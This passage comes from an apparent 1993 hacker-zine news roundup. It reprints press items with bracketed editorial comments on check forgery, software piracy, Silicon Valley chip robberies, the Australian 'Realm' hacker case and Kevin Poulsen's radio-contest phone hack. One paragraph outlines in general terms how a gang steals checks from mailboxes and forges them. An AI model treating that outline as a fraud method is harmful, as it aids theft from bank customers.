  18983. a mailbox to acquire some checks that were mailed to, say, a local utility
  18984. company.  They will copy the account and routing code off some citizen's
  18985. check and decide what branch bank that person probably uses.  Then they forge
  18986. a large corporate or government check to that person, using information from
  18987. other checks they found in the mail.  Packing a forged ID, a gang member
  18988. will then go to a branch across town where presumably nobody knows the
  18989. citizen and deposit part of that forged check.  The check may be for $5000,
  18990. of which the forger takes $2000 as cash, smiles and leaves.
  18991.  
  18992. One check forging gang was chased across Texas for about six months in the
  18993. late 1980s, recalls Robert Ansley, corporate security manager for Dell
  18994. Computer in Austin, Texas, then with the Austin police department.  Armed
  18995. with a stolen Macintosh and an ID maker stolen from a highway patrol
  18996. substation, they passed more than $100,000 in bogus checks in Austin alone.
  18997.  
  18998. Sources say other gangs have used laser printers to forge security ID
  18999. badges to get into office buildings and steal the computers, nodding at the
  19000. friendly security guard at the front desk while trudging out with their
  19001. arms full.
  19002.  
  19003. "We have been urging corporations to move forward with EDI (Electronic
  19004. Data Interchange) for more and more of their business transactions and
  19005. avoid paper, since it will become so vulnerable," says Donn Parker,
  19006. computer crime expert with SRI International in Menlo Park, California.
  19007.  
  19008. In 1991, the Secret Service busted 66 traditional counterfeiting operations,
  19009. while seizing 52 office machines that had been used for counterfeiting
  19010.  
  19011. -------------------------------------------------------------------------------
  19012.  
  19013. Subduing Software Pirates                                         October, 1993
  19014. ~~~~~~~~~~~~~~~~~~~~~~~~~
  19015. by Suzanne Weisband and Seymour Goodman (Technology Review) (Page 30)
  19016.  
  19017. [The software manufacturers claim they lose between 9 and 12 billion
  19018. annually.  Thank GOD for the SPA and the BSA.  Like they are go to
  19019. Singapore or Hong Kong with guns and get the REAL culprits.  Noooo.
  19020. Let's raid BBSes and businesses.
  19021.  
  19022. Their people at COMDEX told me they really weren't interested in
  19023. taking my money to help me combat Phrack Piracy.  I think we all know
  19024. where THEIR interests lie.]
  19025.  
  19026. -------------------------------------------------------------------------------
  19027.  
  19028. Mindvox: Urban Attitude Online                                   November, 1993
  19029. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19030. by Charles Platt (Wired) (Page 56)
  19031.  
  19032. [Another of those cute Mindvox RULES articles.  "Fancher looked too neat,
  19033. clean, and classy to be a hacker, but he enjoyed the cut-and-thrust of
  19034. online jousting as much as anyone."  But wait, there's a little
  19035. name dropping too:  Wil Wheaton, Kurt Larson, Billy Idol, THE LEGION OF DOOM!
  19036.  
  19037. Don't get me wrong, I love Vox.  And I really like the author of this story's
  19038. last book "The Silicon Man," I just get kinda edgy about stuff in Wired.
  19039.  
  19040. Favorite quote:  "Unix is arcane," says Bruce, "and it's weird, and most
  19041. users don't want to deal with it."  I know I don't.  Not.]
  19042. -------------------------------------------------------------------------------
  19043.  
  19044. Intel To Protect Chips                                         October 22, 1993
  19045. ~~~~~~~~~~~~~~~~~~~~~~
  19046. (Newswire Sources)
  19047.  
  19048. One of the nation's largest manufacturers of computer chips said Friday it
  19049. will start to put serial numbers on its products in an effort to stem the
  19050. rising tide of robberies.  Intel Corp. said it was taking its actions
  19051. after a flurry of armed takeover robberies at warehouses in California's
  19052. Silicon Valley over the last six months.
  19053.  
  19054. What the robbers are after is microprocessors -- the brains that power
  19055. personal computers. Among their favorite targets has been Intel's 486
  19056. microprocessor.
  19057.  
  19058. Julius Finkelstein, head of Santa Clara's High Tech Crime Task Force,
  19059. called chip robberies "the gang crime of the 1990s."  "They are just
  19060. as valuable as cocaine," he said. "But they are easier to get rid of
  19061. and if you are caught the penalties aren't as severe."
  19062.  
  19063. The gangs, Finkelstein said, are Asian, well organized and very
  19064. knowledgable about computer components. They generally drive up to a
  19065. warehouse door as if coming for a shipment, but once inside pull out
  19066. their weapons and force the employees to the floor.
  19067.  
  19068. Last month, a takeover robbery at the Wylie Laboratories Electronic
  19069. Marketing Group in Santa Clara netted thieves an estimated $1 million in
  19070. chips. Finkelstein said that robbery took only about 15 minutes.
  19071.  
  19072. -------------------------------------------------------------------------------
  19073.  
  19074. Chip Robberies Continue                                        November 5, 1993
  19075. ~~~~~~~~~~~~~~~~~~~~~~~
  19076. (Newswire Sources)
  19077.  
  19078. Authorities said a gang of Vietnamese-speaking bandits staged a violent
  19079. takeover robbery of a San Jose computer parts company Thursday, wounding
  19080. one man and escaping with an undisclosed amount of electronic equipment.
  19081.  
  19082. Lt. Rob Davis said the robbery began at 1:01 a.m. when as many as
  19083. five gunmen forced their way into the Top Line Electronics Co., a
  19084. computer board manufacturer. The bandits rounded up the employees and
  19085. beat them in an attempt to find where the computer parts were stored.
  19086.  
  19087. One employee was shot in the hip as he tried to escape. Davis said
  19088. the man was treated at a local hospital and was listed in stable
  19089. condition.
  19090.  
  19091. -------------------------------------------------------------------------------
  19092.  
  19093. Hacker Revelled In Spotlight, Court Told                        August 23, 1993
  19094. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19095. (The Age)
  19096.  
  19097. A hacker who broke into a computer at NASA in the United States,
  19098. and contemplated sending it a message not to launch a space shuttle, was
  19099. delighted with the effect he was having, the County Court was told yesterday.
  19100.  
  19101. The prosecutor, Mr Richard Maidment, said that in a three-way
  19102. conversation between Nahshon Even-Chaim,  David John Woodcock
  19103. and another computer hacker, Woodcock discussed sending a message
  19104. to a computer at NASA to stop the launch of a space shuttle, after
  19105. Woodcock talked about the shuttle Challenger, which blew up several
  19106. years before, and said "I have got to do something about NASA."
  19107.  
  19108. Even-Chaim, 22, formerly of Narong Road, Caulfield, yesterday
  19109. pleaded guilty to 15 charges relating to unauthorized obtaining,
  19110. altering, inserting, and erasing of data stored in a computer, and
  19111. the interfering and obstruction of the lawful use of a computer.
  19112.  
  19113. Woodcock, 25, formerly of Ashleigh Avenue, Frankston, pleaded
  19114. guilty to two counts of being knowingly concerned in the obtaining
  19115. of unauthorized access by Even-Chaim to data stored in a computer.
  19116.  
  19117. The court was told that a co-offender, Richard Martin Jones
  19118. was earlier sentenced to six months jail, but was released on a $500,
  19119. six-month good behavior bond.
  19120.  
  19121. The court was told that Even-Chaim obtained free use of telephone
  19122. lines for many hours to connect his home computer to other systems
  19123. in the United States.
  19124.  
  19125. Mr. Maidment said that Even-Chaim, Woodcock, and Jones, who
  19126. collectively called themselves "The Realm", were arrested in April 1990
  19127. by the Australia Federal Police after an investigation that began with
  19128. information received from the United States Secret Service.
  19129.  
  19130. -------------------------------------------------------------------------------
  19131.  
  19132. The Last Hacker                                              September 26, 1993
  19133. ~~~~~~~~~~~~~~~
  19134. by Jonathan Littman (LA Times)
  19135.  
  19136. [This is the bet article I've seen yet about Kevin Poulsen.  Please go
  19137.  find it and read it.  It covers Poulsen from beginning to end.  All the
  19138.  crazy stunts, the life on the run, the show down with the feds.  Everything.
  19139.  Here is a small excerpt.]
  19140.  
  19141. KIIS-Fm called it a "Win a Porsche by Friday": eight Porsches - about
  19142. $400,000 worth of steel, leather and status - given away, one a week. You could
  19143. hardly live or work in Los Angeles without being caught up in the frenzy. It
  19144. seems that the gleaming, candy-red convertibles were plastered on nearly every
  19145. billboard and bus in town. Listeners were glued to KIIS, hoping to make the
  19146. 102nd call after Dees spun the third song in the magical series.
  19147.  
  19148. Housewives, businessmen, students and contest freaks jammed the lines with
  19149. their car phones and auto-dialers. They all had hopes, but one 24-year-old high
  19150. school dropout had a plan. America's most wanted hacker and his associates
  19151. sat by their computers and waited. On the morning of June 1, 1990 KIIS played
  19152. 'Escapade,' 'Love Shack; and then, yes, "Kiss." "We blew out the phone lines,"
  19153. every line was ringing says Karen Tobin, the stations promotional director. "We
  19154. picked up the calls and counted."
  19155.  
  19156. The hacker was counting too. At the precise moment Price's "Kiss" hit the air
  19157. he seized control of the station's 25 phone liens, blocking out all calls but
  19158. his own. Then the man, who identified himself as Michael B. Peters, calmly
  19159. dialed the 102nd call and won a Porsche 944 S2.
  19160.  
  19161. It was child's play. Especially for Kevin Lee Poulsen. Computer hacking had
  19162. once seemed an innocent obsession to Poulsen, a native of Pasadena, but now it
  19163. was his life, and it had taken him over the line. This October, Poulsen will
  19164. face the first of two trials, one in San Jose and another in Los Angeles, that
  19165. federal prosecutors say are critical to the government. Because of the
  19166. seriousness of his alleged breaches of national security, they intend to use the
  19167. case as an example to the hacker underground.
  19168.  
  19169. As a teen-ager, Poulsen had burrowed deep into the giant switching networks
  19170. of Pacific Bell, exploring and exploiting nearly every element of its powerful
  19171. computers, from the common systems responsible for creating, changing and
  19172. maintaining phone service to the shadow systems that guard the secrets of
  19173. national security, according to accusations in a federal indictment. The U.S.
  19174. attorney in San Jose says that Poulsen had wiretapped the intimate phone calls
  19175. of a Hollywood starlet, allegedly conspired to steal classified military orders,
  19176. and reportedly uncovered unpublished telephone numbers for the Soviet Consulate
  19177. in San Francisco.
  19178.  
  19179. -------------------------------------------------------------------------------
  19180.  
  19181.  
  19182.